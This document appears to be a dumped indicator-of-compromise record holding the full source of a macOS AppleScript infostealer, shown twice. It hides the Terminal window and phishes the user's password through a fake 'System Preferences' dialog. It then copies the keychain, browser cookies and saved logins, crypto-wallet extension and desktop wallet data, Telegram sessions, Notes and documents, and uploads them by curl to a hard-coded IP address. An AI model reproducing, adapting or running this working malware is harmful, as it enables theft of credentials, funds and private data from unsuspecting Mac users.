\"enabgbdfcbaehmbigakijjabdpdnimlg\", \"mgffkfbidihjpoaomajlbgchddlicgpn\", \"fopmedgnkfpebgllppeddmmochcookhc\", \"jojhfeoedkpkglbfimdfabpdfjaoolaf\", \"ammjlinfekkoockogfhdkgcohjlbhmff\", \"abkahkcbhngaebpcgfmhkoioedceoigp\", \"dcbjpgbkjoomeenajdabiicabjljlnfp\", \"gkeelndblnomfmjnophbhfhcjbcnemka\", \"pnndplcbkakcplkjnolgbkdgjikjednm\", \"copjnifcecdedocejpaapepagaodgpbh\", \"hgbeiipamcgbdjhfflifkgehomnmglgk\", \"mkchoaaiifodcflmbaphdgeidocajadp\", \"ellkdbaphhldpeajbepobaecooaoafpg\", \"mdnaglckomeedfbogeajfajofmfgpoae\", \"nknhiehlklippafakaeklbeglecifhad\", \"ckklhkaabbmdjkahiaaplikpdddkenic\", \"fmblappgoiilbgafhjklehhfifbdocee\", \"nphplpgoakhhjchkkhmiggakijnkhfnd\", \"cnmamaachppnkjgnildpdmkaakejnhae\", \"fijngjgcjhjmmpcmkeiomlglpeiijkld\", \"niiaamnmgebpeejeemoifgdndgeaekhe\", \"odpnjmimokcmjgojhnhfcnalnegdjmdn\", \"lbjapbcmmceacocpimbpbidpgmlmoaao\", \"hnfanknocfeofbddgcijnmhnfnkdnaad\", \"hpglfhgfnhbgpjdenjgmdgoeiappafln\", \"egjidjbpglichdcondbcbdnbeeppgdph\", \"ibljocddagjghmlpgihahamcghfggcjc\", \"gkodhkbmiflnmkipcmlhhgadebbeijhh\", \"dbgnhckhnppddckangcjbkjnlddbjkna\", \"mfhbebgoclkghebffdldpobeajmbecfk\", \"nlbmnnijcnlegkjjpcfjclmcfggfefdm\", \"nlgbhdfgdhgbiamfdfmbikcdghidoadd\", \"acmacodkjbdgmoleebolmdjonilkdbch\", \"agoakfejjabomempkjlepdflaleeobhb\", \"dgiehkgfknklegdhekgeabnhgfjhbajd\", \"onhogfjeacnfoofkfgppdlbmlmnplgbn\", \"kkpehldckknjffeakihjajcjccmcjflh\", \"jaooiolkmfcmloonphpiiogkfckgciom\", \"ojggmchlghnjlapmfbnjholfjkiidbch\", \"pmmnimefaichbcnbndcfpaagbepnjaig\", \"oiohdnannmknmdlddkdejbmplhbdcbee\", \"aiifbnbfobpmeekipheeijimdpnlpgpp\", \"aholpfdialjgjfhomihkjbmgjidlcdno\", \"anokgmphncpekkhclmingpimjmcooifb\", \"kkpllkodjeloidieedojogacfhpaihoh\", \"iokeahhehimjnekafflcihljlcjccdbe\", \"ifckdpamphokdglkkdomedpdegcjhjdp\", \"loinekcabhlmhjjbocijdoimmejangoa\", \"fcfcfllfndlomdhbehjjcoimbgofdncg\", \"ifclboecfhkjbpmhgehodcjpciihhmif\", \"dmkamcknogkgcdfhhbddcghachkejeap\", \"ookjlbkiijinhpmnjffcofjonbfbgaoc\", \"oafedfoadhdjjcipmcbecikgokpaphjk\", \"mapbhaebnddapnmifbbkgeedkeplgjmf\", \"cmndjbecilbocjfkibfbifhngkdmjgog\", \"kpfopkelmapcoipemfendmdcghnegimn\", \"lgmpcpglpngdoalbgeoldeajfclnhafa\", \"ppbibelpcjmhbdihakflkdcoccbgbkpo\", \"ffnbelfdoeiohenkjibnmadjiehjhajb\", \"opcgpfmipidbgpenhmajoajpbobppdil\", \"lakggbcodlaclcbbbepmkpdhbcomcgkd\", \"kgdijkcfiglijhaglibaidbipiejjfdp\", \"hdkobeeifhdplocklknbnejdelgagbao\", \"lnnnmfcpbkafcpgdilckhmhbkkbpkmid\", \"nbdhibgjnjpnkajaghbffjbkcgljfgdi\", \"kmhcihpebfmpgmihbkipmjlmmioameka\", \"kmphdnilpmdejikjdnlbcnmnabepfgkh\", \"nngceckbapebfimnlniiiahkandclblb\"} set chromiumFiles to {\"/Network/Cookies\", \"/Cookies\", \"/Web Data\", \"/Login Data\", \"/Local Extension Settings/\", \"/IndexedDB/\"} repeat with chromium in chromium_map set savePath to writemind & \"Chromium/\" & item 1 of chromium & \"_\" try set fileList to list folder item 2 of chromium without invisibles repeat with currentItem in fileList if ((currentItem as string) is equal to \"Default\") or ((currentItem as string) contains \"Profile\") then repeat with CFile in chromiumFiles set readpath to (item 2 of chromium & currentItem & CFile) if ((CFile as string) is equal to \"/Network/Cookies\") then set CFile to \"/Cookies\" end if if ((CFile as string) is equal to \"/Local Extension Settings/\") then grabPlugins(readpath, savePath & currentItem, pluginList, false) else if (CFile as string) is equal to \"/IndexedDB/\" then grabPlugins(readpath, savePath & currentItem, pluginList, true) else set writepath to savePath & currentItem & CFile readwrite(readpath, writepath) end if end repeat end if end repeat end try end repeat end chromium on telegram(writemind, library) try GrabFolder(library & \"Telegram Desktop/tdata/\", writemind & \"Telegram Data/\") end try end telegram on deskwallets(writemind, deskwals) repeat with deskwal in deskwals try GrabFolder(item 2 of deskwal, writemind & item 1 of deskwal) end try end repeat end deskwallets on filegrabber(writemind) try set destinationFolderPath to POSIX file (writemind & \"FileGrabber/\") mkdir(destinationFolderPath) set photosPath to POSIX file (writemind & \"FileGrabber/NotesFiles/\") mkdir(photosPath) set extensionsList to {\"txt\", \"pdf\", \"docx\", \"wallet\", \"key\", \"keys\", \"doc\"} set bankSize to 0 tell application \"Finder\" try set safariFolderPath to (path to home folder as text) & \"Library:Cookies:\" duplicate file (safariFolderPath & \"Cookies.binarycookies\") to folder destinationFolderPath with replacing set name of result to \"saf1\" end try try set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group Containers:group.com.apple.notes:\" set notesAccounts to folder (notesFolderPath & \"Accounts:LocalAccount:Media\") duplicate notesAccounts to photosPath with replacing duplicate notesAccounts to POSIX file photosPath as alias with replacing set notesFolder to folder notesFolderPath set notesFiles to {\"NoteStore.sqlite\", \"NoteStore.sqlite-shm\", \"NoteStore.sqlite-wal\"} repeat with fileName in notesFiles set sourceFile to file fileName of notesFolder duplicate sourceFile to POSIX file destinationFolderPath as alias with replacing end repeat end try try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) set downloadsFiles to every file of folder \"Downloads\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles & downloadsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set filesize to size of aFile if filesize < 3 * 1024 * 1024 then if (bankSize + filesize) < 30 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + filesize end try else exit repeat end if end if end if end repeat end try end tell end try end filegrabber on send_data(attempt) try set result_send to (do shell script \"curl -X POST -H \\\"user: U86a4irDPnx0tAJz7TLOjLJYmAQVbgSjU5qs/B5Ew50=\\\" -H \\\"BuildID: xfSjtQhSzYb0Vrl3d-Yt-dadILWIh9rw4YAjC3vFKmI=\\\" -H \\\"cl: 0\\\" -H \\\"cn: 0\\\" --max-time 300 -retry 5 -retry-delay 10 -F \\\"file=@/tmp/out.zip\\\" http://141.98.9.20/joinsystem\") on error if attempt < 40 then delay 3 send_data(attempt + 1) end if end try end send_data set username to (system attribute \"USER\") set profile to \"/Users/\" & username set randomNumber to do shell script \"echo \$((RANDOM % 9000 + 1000))\" set writemind to \"/tmp/\" & randomNumber & \"/\" try set result to (do shell script \"system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType\") writeText(result, writemind & \"info\") end try set library to profile & \"/Library/Application Support/\" set password_entered to getpwd(username, writemind) delay 0.01 set chromiumMap to {{\"Chrome\", library & \"Google/Chrome/\"}, {\"Brave\", library & \"BraveSoftware/Brave-Browser/\"}, {\"Edge\", library & \"Microsoft Edge/\"}, {\"Vivaldi\", library & \"Vivaldi/\"}, {\"Opera\", library & \"com.operasoftware.Opera/\"}, {\"OperaGX\", library & \"com.operasoftware.OperaGX/\"}, {\"Chrome Beta\", library & \"Google/Chrome Beta/\"}, {\"Chrome Canary\", library & \"Google/Chrome Canary\"}, {\"Chromium\", library & \"Chromium/\"}, {\"Chrome Dev\", library & \"Google/Chrome Dev/\"}, {\"Arc\", library & \"Arc/\"}, {\"Coccoc\", library & \"Coccoc/\"}} set walletMap to {{\"deskwallets/Electrum\", profile & \"/.electrum/wallets/\"}, {\"deskwallets/Coinomi\", library & \"Coinomi/wallets/\"}, {\"deskwallets/Exodus\", library & \"Exodus/\"}, {\"deskwallets/Atomic\", library & \"atomic/Local Storage/leveldb/\"}, {\"deskwallets/Wasabi\", profile & \"/.walletwasabi/client/Wallets/\"}, {\"deskwallets/Ledger_Live\", library & \"Ledger Live/\"}, {\"deskwallets/Monero\", profile & \"/Monero/wallets/\"}, {\"deskwallets/Bitcoin_Core\", library & \"Bitcoin/wallets/\"}, {\"deskwallets/Litecoin_Core\", library & \"Litecoin/wallets/\"}, {\"deskwallets/Dash_Core\", library & \"DashCore/wallets/\"}, {\"deskwallets/Electrum_LTC\", profile & \"/.electrum-ltc/wallets/\"}, {\"deskwallets/Electron_Cash\", profile & \"/.electron-cash/wallets/\"}, {\"deskwallets/Guarda\", library & \"Guarda/\"}, {\"deskwallets/Dogecoin_Core\", library & \"Dogecoin/wallets/\"}, {\"deskwallets/Trezor_Suite\", library & \"@trezor/suite-desktop/\"}} readwrite(library & \"Binance/app-store.json\", writemind & \"deskwallets/Binance/app-store.json\") readwrite(library & \"@tonkeeper/desktop/config.json\", \"deskwallets/TonKeeper/config.json\") readwrite(profile & \"/Library/Keychains/login.keychain-db\", writemind & \"keychain\") if release then readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\", writemind & \"FileGrabber/NoteStore.sqlite\") readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-wal\", writemind & \"FileGrabber/NoteStore.sqlite-wal\") readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-shm\", writemind & \"FileGrabber/NoteStore.sqlite-shm\") readwrite2(profile & \"/Library/Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies\", writemind & \"FileGrabber/Cookies.binarycookies\") readwrite(profile & \"/Library/Cookies/Cookies.binarycookies\", writemind & \"FileGrabber/saf1\") end if if filegrabbers then filegrabber(writemind) end if writeText(username, writemind & \"username\") set ff_paths to {library & \"Firefox/Profiles/\", library & \"Waterfox/Profiles/\", library & \"Pale Moon/Profiles/\"} repeat with firefox in ff_paths try parseFF(firefox, writemind) end try end repeat chromium(writemind, chromiumMap) deskwallets(writemind, walletMap) telegram(writemind, library) do shell script \"ditto -c -k --sequesterRsrc \" & writemind & \" /tmp/out.zip\" send_data(0) do shell script \"rm -r \" & writemind do shell script \"rm /tmp/out.zip\" "

ioc

process

sh -c "osascript -e 'set release to true set filegrabbers to true if release then try tell window 1 of application \"Terminal\" to set visible to false end try end if on filesizer(paths) set fsz to 0 try set theItem to quoted form of POSIX path of paths set fsz to (do shell script \"/usr/bin/mdls -name kMDItemFSSize -raw \" & theItem) end try return fsz end filesizer on mkdir(someItem) try set filePosixPath to quoted form of (POSIX path of someItem) do shell script \"mkdir -p \" & filePosixPath end try end mkdir on FileName(filePath) try set reversedPath to (reverse of every character of filePath) as string set trimmedPath to text 1 thru ((offset of \"/\" in reversedPath) - 1) of reversedPath set finalPath to (reverse of every character of trimmedPath) as string return finalPath end try end FileName on BeforeFileName(filePath) try set lastSlash to offset of \"/\" in (reverse of every character of filePath) as string set trimmedPath to text 1 thru -(lastSlash + 1) of filePath return trimmedPath end try end BeforeFileName on writeText(textToWrite, filePath) try set folderPath to BeforeFileName(filePath) mkdir(folderPath) set fileRef to (open for access filePath with write permission) write textToWrite to fileRef starting at eof close access fileRef end try end writeText on readwrite(path_to_file, path_as_save) try set fileContent to read path_to_file set folderPath to BeforeFileName(path_as_save) mkdir(folderPath) do shell script \"cat \" & quoted form of path_to_file & \" > \" & quoted form of path_as_save end try end readwrite on readwrite2(path_to_file, path_as_save) try set folderPath to do shell script \"dirname \" & quoted form of path_as_save mkdir(folderPath) tell application \"Finder\" set sourceFile to POSIX file path_to_file as alias set destinationFolder to POSIX file folderPath as alias duplicate sourceFile to destinationFolder with replacing end tell end try end readwrite2 on isDirectory(someItem) try set filePosixPath to quoted form of (POSIX path of someItem) set fileType to (do shell script \"file -b \" & filePosixPath) if fileType ends with \"directory\" then return true end if return false end try end isDirectory on GrabFolderLimit(sourceFolder, destinationFolder) try set bankSize to 0 set exceptionsList to {\".DS_Store\", \"Partitions\", \"Code Cache\", \"Cache\", \"market-history-cache.json\", \"journals\", \"Previews\"} set fileList to list folder sourceFolder without invisibles mkdir(destinationFolder) repeat with currentItem in fileList if currentItem is not in exceptionsList then set itemPath to sourceFolder & \"/\" & currentItem set savePath to destinationFolder & \"/\" & currentItem if isDirectory(itemPath) then GrabFolderLimit(itemPath, savePath) else set fsz to filesizer(itemPath) set bankSize to bankSize + fsz if bankSize < 10 * 1024 * 1024 then readwrite(itemPath, savePath) end if end if end if end repeat end try end GrabFolderLimit on GrabFolder(sourceFolder, destinationFolder) try set exceptionsList to {\".DS_Store\", \"Partitions\", \"Code Cache\", \"Cache\", \"market-history-cache.json\", \"journals\", \"Previews\", \"dumps\", \"emoji\", \"user_data\", \"__update__\", \"user_data#2\", \"user_data#3\"} set fileList to list folder sourceFolder without invisibles mkdir(destinationFolder) repeat with currentItem in fileList if currentItem is not in exceptionsList then set itemPath to sourceFolder & \"/\" & currentItem set savePath to destinationFolder & \"/\" & currentItem if isDirectory(itemPath) then GrabFolder(itemPath, savePath) else readwrite(itemPath, savePath) end if end if end repeat end try end GrabFolder on parseFF(firefox, writemind) try set myFiles to {\"/cookies.sqlite\", \"/formhistory.sqlite\", \"/key4.db\", \"/logins.json\"} set fileList to list folder firefox without invisibles repeat with currentItem in fileList set fpath to writemind & \"ff/\" & currentItem set readpath to firefox & currentItem repeat with FFile in myFiles readwrite(readpath & FFile, fpath & FFile) end repeat end repeat end try end parseFF on checkvalid(username, password_entered) try set result to do shell script \"dscl . authonly \" & quoted form of username & space & quoted form of password_entered if result is not equal to \"\" then return false else return true end if on error return false end try end checkvalid on getpwd(username, writemind) try if checkvalid(username, \"\") then set result to do shell script \"security 2>&1 > /dev/null find-generic-password -ga \\\"Chrome\\\" | awk \\\"{print \$2}\\\"\" writeText(result as string, writemind & \"masterpass-chrome\") else repeat set result to display dialog \"Required Application Helper.\\nPlease enter password for continue.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"System Preferences\" with hidden answer set password_entered to text returned of result if checkvalid(username, password_entered) then writeText(password_entered, writemind & \"pwd\") return password_entered end if end repeat end if end try return \"\" end getpwd on grabPlugins(paths, savePath, pluginList, index) try set fileList to list folder paths without invisibles repeat with PFile in fileList repeat with Plugin in pluginList if (PFile contains Plugin) then set newpath to paths & PFile set newsavepath to savePath & \"/\" & Plugin if index then set newsavepath to newsavepath & \"/IndexedDB/\" end if GrabFolder(newpath, newsavepath) end if end repeat end repeat end try end grabPlugins on chromium(writemind, chromium_map) set pluginList to {\"keenhcnmdmjjhincpilijphpiohdppno\", \"hbbgbephgojikajhfbomhlmmollphcad\", \"cjmkndjhnagcfbpiemnkdpomccnjblmj\", \"dhgnlgphgchebgoemcjekedjjbifijid\", \"hifafgmccdpekplomjjkcfgodnhcellj\", \"kamfleanhcmjelnhaeljonilnmjpkcjc\", \"jnldfbidonfeldmalbflbmlebbipcnle\", \"fdcnegogpncmfejlfnffnofpngdiejii\", \"klnaejjgbibmhlephnhpmaofohgkpgkd\", \"pdadjkfkgcafgbceimcpbkalnfnepbnk\", \"kjjebdkfeagdoogagbhepmbimaphnfln\", \"ldinpeekobnhjjdofggfgjlcehhmanlj\", \"dkdedlpgdmmkkfjabffeganieamfklkm\", \"bcopgchhojmggmffilplmbdicgaihlkp\", \"kpfchfdkjhcoekhdldggegebfakaaiog\", \"idnnbdplmphpflfnlkomgpfbpcgelopg\", \"mlhakagmgkmonhdonhkpjeebfphligng\", \"bipdhagncpgaccgdbddmbpcabgjikfkn\", \"gcbjmdjijjpffkpbgdkaojpmaninaion\", \"nhnkbkgjikgcigadomkphalanndcapjk\", \"bhhhlbepdkbapadjdnnojkbgioiodbic\", \"hoighigmnhgkkdaenafgnefkcmipfjon\", \"klghhnkeealcohjjanjjdaeeggmfmlpl\", \"nkbihfbeogaeaoehlefnkodbefgpgknn\", \"fhbohimaelbohpjbbldcngcnapndodjp\", \"ebfidpplhabeedpnhjnobghokpiioolj\", \"emeeapjkbcbpbpgaagfchmcgglmebnen\", \"fldfpgipfncgndfolcbkdeeknbbbnhcc\", \"penjlddjkjgpnkllboccdgccekpkcbin\", \"fhilaheimglignddkjgofkcbgekhenbh\", \"hmeobnfnfcmdkdcmlblgagmfpfboieaf\", \"cihmoadaighcejopammfbmddcmdekcje\", \"lodccjjbdhfakaekdiahmedfbieldgik\", \"omaabbefbmiijedngplfjmnooppbclkk\", \"cjelfplplebdjjenllpjcblmjkfcffne\", \"jnlgamecbpmbajjfhmmmlhejkemejdma\", \"fpkhgmpbidmiogeglndfbkegfdlnajnf\", \"bifidjkcdpgfnlbcjpdkdcnbiooooblg\", \"amkmjjmmflddogmhpjloimipbofnfjih\", \"flpiciilemghbmfalicajoolhkkenfel\", \"hcflpincpppdclinealmandijcmnkbgn\", \"aeachknmefphepccionboohckonoeemg\", \"nlobpakggmbcgdbpjpnagmdbdhdhgphk\", \"momakdpclmaphlamgjcndbgfckjfpemp\", \"mnfifefkajgofkcjkemidiaecocnkjeh\", \"fnnegphlobjdpkhecapkijjdkgcjhkib\", \"ehjiblpccbknkgimiflboggcffmpphhp\", \"ilhaljfiglknggcoegeknjghdgampffk\", \"pgiaagfkgcbnmiiolekcfmljdagdhlcm\", \"fnjhmkhhmkbjkkabndcnnogagogbneec\", \"bfnaelmomeimhlpmgjnjophhpkkoljpa\", \"imlcamfeniaidioeflifonfjeeppblda\", \"mdjmfdffdcmnoblignmgpommbefadffd\", \"ooiepdgjjnhcmlaobfinbomgebfgablh\", \"pcndjhkinnkaohffealmlmhaepkpmgkb\", \"ppdadbejkmjnefldpcdjhnkpbjkikoip\", \"cgeeodpfagjceefieflmdfphplkenlfk\", \"dlcobpjiigpikoobohmabehhmhfoodbb\", \"jiidiaalihmmhddjgbnbgdfflelocpak\", \"bocpokimicclpaiekenaeelehdjllofo\", \"pocmplpaccanhmnllbbkpgfliimjljgo\", \"cphhlgmgameodnhkjdmkpanlelnlohao\", \"mcohilncbfahbmgdjkbpemcciiolgcge\", \"bopcbmipnjdcdfflfgjdgdjejmgpoaab\", \"khpkpbbcccdmmclmpigdgddabeilkdpd\", \"ejjladinnckdgjemekebdpeokbikhfci\", \"phkbamefinggmakgklpkljjmgibohnba\", \"epapihdplajcdnnkdeiahlgigofloibg\", \"hpclkefagolihohboafpheddmmgdffjm\", \"cjookpbkjnpkmknedggeecikaponcalb\", \"cpmkedoipcpimgecpmgpldfpohjplkpp\", \"modjfdjcodmehnpccdjngmdfajggaoeh\", \"ibnejdfjmmkpcnlpebklmnkoeoihofec\", \"afbcbjpbpfadlkmhmclhkeeodmamcflc\", \"kncchdigobghenbbaddojjnnaogfppfj\", \"efbglgofoippbgcjepnhiblaibcnclgk\", \"mcbigmjiafegjnnogedioegffbooigli\", \"fccgmnglbhajioalokbcidhcaikhlcpm\", \"hnhobjmcibchnmglfbldbfabcgaknlkj\", \"apnehcjmnengpnmccpaibjmhhoadaico\", \"enabgbdfcbaehmbigakijjabdpdnimlg\", \"mgffkfbidihjpoaomajlbgchddlicgpn\", \"fopmedgnkfpebgllppeddmmochcookhc\", \"jojhfeoedkpkglbfimdfabpdfjaoolaf\", \"ammjlinfekkoockogfhdkgcohjlbhmff\", \"abkahkcbhngaebpcgfmhkoioedceoigp\", \"dcbjpgbkjoomeenajdabiicabjljlnfp\", \"gkeelndblnomfmjnophbhfhcjbcnemka\", \"pnndplcbkakcplkjnolgbkdgjikjednm\", \"copjnifcecdedocejpaapepagaodgpbh\", \"hgbeiipamcgbdjhfflifkgehomnmglgk\", \"mkchoaaiifodcflmbaphdgeidocajadp\", \"ellkdbaphhldpeajbepobaecooaoafpg\", \"mdnaglckomeedfbogeajfajofmfgpoae\", \"nknhiehlklippafakaeklbeglecifhad\", \"ckklhkaabbmdjkahiaaplikpdddkenic\", \"fmblappgoiilbgafhjklehhfifbdocee\", \"nphplpgoakhhjchkkhmiggakijnkhfnd\", \"cnmamaachppnkjgnildpdmkaakejnhae\", \"fijngjgcjhjmmpcmkeiomlglpeiijkld\", \"niiaamnmgebpeejeemoifgdndgeaekhe\", \"odpnjmimokcmjgojhnhfcnalnegdjmdn\", \"lbjapbcmmceacocpimbpbidpgmlmoaao\", \"hnfanknocfeofbddgcijnmhnfnkdnaad\", \"hpglfhgfnhbgpjdenjgmdgoeiappafln\", \"egjidjbpglichdcondbcbdnbeeppgdph\", \"ibljocddagjghmlpgihahamcghfggcjc\", \"gkodhkbmiflnmkipcmlhhgadebbeijhh\", \"dbgnhckhnppddckangcjbkjnlddbjkna\", \"mfhbebgoclkghebffdldpobeajmbecfk\", \"nlbmnnijcnlegkjjpcfjclmcfggfefdm\", \"nlgbhdfgdhgbiamfdfmbikcdghidoadd\", \"acmacodkjbdgmoleebolmdjonilkdbch\", \"agoakfejjabomempkjlepdflaleeobhb\", \"dgiehkgfknklegdhekgeabnhgfjhbajd\", \"onhogfjeacnfoofkfgppdlbmlmnplgbn\", \"kkpehldckknjffeakihjajcjccmcjflh\", \"jaooiolkmfcmloonphpiiogkfckgciom\", \"ojggmchlghnjlapmfbnjholfjkiidbch\", \"pmmnimefaichbcnbndcfpaagbepnjaig\", \"oiohdnannmknmdlddkdejbmplhbdcbee\", \"aiifbnbfobpmeekipheeijimdpnlpgpp\", \"aholpfdialjgjfhomihkjbmgjidlcdno\", \"anokgmphncpekkhclmingpimjmcooifb\", \"kkpllkodjeloidieedojogacfhpaihoh\", \"iokeahhehimjnekafflcihljlcjccdbe\", \"ifckdpamphokdglkkdomedpdegcjhjdp\", \"loinekcabhlmhjjbocijdoimmejangoa\", \"fcfcfllfndlomdhbehjjcoimbgofdncg\", \"ifclboecfhkjbpmhgehodcjpciihhmif\", \"dmkamcknogkgcdfhhbddcghachkejeap\", \"ookjlbkiijinhpmnjffcofjonbfbgaoc\", \"oafedfoadhdjjcipmcbecikgokpaphjk\", \"mapbhaebnddapnmifbbkgeedkeplgjmf\", \"cmndjbecilbocjfkibfbifhngkdmjgog\", \"kpfopkelmapcoipemfendmdcghnegimn\", \"lgmpcpglpngdoalbgeoldeajfclnhafa\", \"ppbibelpcjmhbdihakflkdcoccbgbkpo\", \"ffnbelfdoeiohenkjibnmadjiehjhajb\", \"opcgpfmipidbgpenhmajoajpbobppdil\", \"lakggbcodlaclcbbbepmkpdhbcomcgkd\", \"kgdijkcfiglijhaglibaidbipiejjfdp\", \"hdkobeeifhdplocklknbnejdelgagbao\", \"lnnnmfcpbkafcpgdilckhmhbkkbpkmid\", \"nbdhibgjnjpnkajaghbffjbkcgljfgdi\", \"kmhcihpebfmpgmihbkipmjlmmioameka\", \"kmphdnilpmdejikjdnlbcnmnabepfgkh\", \"nngceckbapebfimnlniiiahkandclblb\"} set chromiumFiles to {\"/Network/Cookies\", \"/Cookies\", \"/Web Data\", \"/Login Data\", \"/Local Extension Settings/\", \"/IndexedDB/\"} repeat with chromium in chromium_map set savePath to writemind & \"Chromium/\" & item 1 of chromium & \"_\" try set fileList to list folder item 2 of chromium without invisibles repeat with currentItem in fileList if ((currentItem as string) is equal to \"Default\") or ((currentItem as string) contains \"Profile\") then repeat with CFile in chromiumFiles set readpath to (item 2 of chromium & currentItem & CFile) if ((CFile as string) is equal to \"/Network/Cookies\") then set CFile to \"/Cookies\" end if if ((CFile as string) is equal to \"/Local Extension Settings/\") then grabPlugins(readpath, savePath & currentItem, pluginList, false) else if (CFile as string) is equal to \"/IndexedDB/\" then grabPlugins(readpath, savePath & currentItem, pluginList, true) else set writepath to savePath & currentItem & CFile readwrite(readpath, writepath) end if end repeat end if end repeat end try end repeat end chromium on telegram(writemind, library) try GrabFolder(library & \"Telegram Desktop/tdata/\", writemind & \"Telegram Data/\") end try end telegram on deskwallets(writemind, deskwals) repeat with deskwal in deskwals try GrabFolder(item 2 of deskwal, writemind & item 1 of deskwal) end try end repeat end deskwallets on filegrabber(writemind) try set destinationFolderPath to POSIX file (writemind & \"FileGrabber/\") mkdir(destinationFolderPath) set photosPath to POSIX file (writemind & \"FileGrabber/NotesFiles/\") mkdir(photosPath) set extensionsList to {\"txt\", \"pdf\", \"docx\", \"wallet\", \"key\", \"keys\", \"doc\"} set bankSize to 0 tell application \"Finder\" try set safariFolderPath to (path to home folder as text) & \"Library:Cookies:\" duplicate file (safariFolderPath & \"Cookies.binarycookies\") to folder destinationFolderPath with replacing set name of result to \"saf1\" end try try set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group Containers:group.com.apple.notes:\" set notesAccounts to folder (notesFolderPath & \"Accounts:LocalAccount:Media\") duplicate notesAccounts to photosPath with replacing duplicate notesAccounts to POSIX file photosPath as alias with replacing set notesFolder to folder notesFolderPath set notesFiles to {\"NoteStore.sqlite\", \"NoteStore.sqlite-shm\", \"NoteStore.sqlite-wal\"} repeat with fileName in notesFiles set sourceFile to file fileName of notesFolder duplicate sourceFile to POSIX file destinationFolderPath as alias with replacing end repeat end try try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) set downloadsFiles to every file of folder \"Downloads\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles & downloadsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set filesize to size of aFile if filesize < 3 * 1024 * 1024 then if (bankSize + filesize) < 30 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + filesize end try else exit repeat end if end if end if end repeat end try end tell end try end filegrabber on send_data(attempt) try set result_send to (do shell script \"curl -X POST -H \\\"user: U86a4irDPnx0tAJz7TLOjLJYmAQVbgSjU5qs/B5Ew50=\\\" -H \\\"BuildID: xfSjtQhSzYb0Vrl3d-Yt-dadILWIh9rw4YAjC3vFKmI=\\\" -H \\\"cl: 0\\\" -H \\\"cn: 0\\\" --max-time 300 -retry 5 -retry-delay 10 -F \\\"file=@/tmp/out.zip\\\" http://141.98.9.20/joinsystem\") on error if attempt < 40 then delay 3 send_data(attempt + 1) end if end try end send_data set username to (system attribute \"USER\") set profile to \"/Users/\" & username set randomNumber to do shell script \"echo \$((RANDOM % 9000 + 1000))\" set writemind to \"/tmp/\" & randomNumber & \"/\" try set result to (do shell script \"system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType\") writeText(result, writemind & \"info\") end try set library to profile & \"/Library/Application Support/\" set password_entered to getpwd(username, writemind) delay 0.01 set chromiumMap to {{\"Chrome\", library & \"Google/Chrome/\"}, {\"Brave\", library & \"BraveSoftware/Brave-Browser/\"}, {\"Edge\", library & \"Microsoft Edge/\"}, {\"Vivaldi\", library & \"Vivaldi/\"}, {\"Opera\", library & \"com.operasoftware.Opera/\"}, {\"OperaGX\", library & \"com.operasoftware.OperaGX/\"}, {\"Chrome Beta\", library & \"Google/Chrome Beta/\"}, {\"Chrome Canary\", library & \"Google/Chrome Canary\"}, {\"Chromium\", library & \"Chromium/\"}, {\"Chrome Dev\", library & \"Google/Chrome Dev/\"}, {\"Arc\", library & \"Arc/\"}, {\"Coccoc\", library & \"Coccoc/\"}} set walletMap to {{\"deskwallets/Electrum\", profile & \"/.electrum/wallets/\"}, {\"deskwallets/Coinomi\", library & \"Coinomi/wallets/\"}, {\"deskwallets/Exodus\", library & \"Exodus/\"}, {\"deskwallets/Atomic\", library & \"atomic/Local Storage/leveldb/\"}, {\"deskwallets/Wasabi\", profile & \"/.walletwasabi/client/Wallets/\"}, {\"deskwallets/Ledger_Live\", library & \"Ledger Live/\"}, {\"deskwallets/Monero\", profile & \"/Monero/wallets/\"}, {\"deskwallets/Bitcoin_Core\", library & \"Bitcoin/wallets/\"}, {\"deskwallets/Litecoin_Core\", library & \"Litecoin/wallets/\"}, {\"deskwallets/Dash_Core\", library & \"DashCore/wallets/\"}, {\"deskwallets/Electrum_LTC\", profile & \"/.electrum-ltc/wallets/\"}, {\"deskwallets/Electron_Cash\", profile & \"/.electron-cash/wallets/\"}, {\"deskwallets/Guarda\", library & \"Guarda/\"}, {\"deskwallets/Dogecoin_Core\", library & \"Dogecoin/wallets/\"}, {\"deskwallets/Trezor_Suite\", library & \"@trezor/suite-desktop/\"}} readwrite(library & \"Binance/app-store.json\", writemind & \"deskwallets/Binance/app-store.json\") readwrite(library & \"@tonkeeper/desktop/config.json\", \"deskwallets/TonKeeper/config.json\") readwrite(profile & \"/Library/Keychains/login.keychain-db\", writemind & \"keychain\") if release then readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\", writemind & \"FileGrabber/NoteStore.sqlite\") readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-wal\", writemind & \"FileGrabber/NoteStore.sqlite-wal\") readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-shm\", writemind & \"FileGrabber/NoteStore.sqlite-shm\") readwrite2(profile & \"/Library/Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies\", writemind & \"FileGrabber/Cookies.binarycookies\") readwrite(profile & \"/Library/Cookies/Cookies.binarycookies\", writemind & \"FileGrabber/saf1\") end 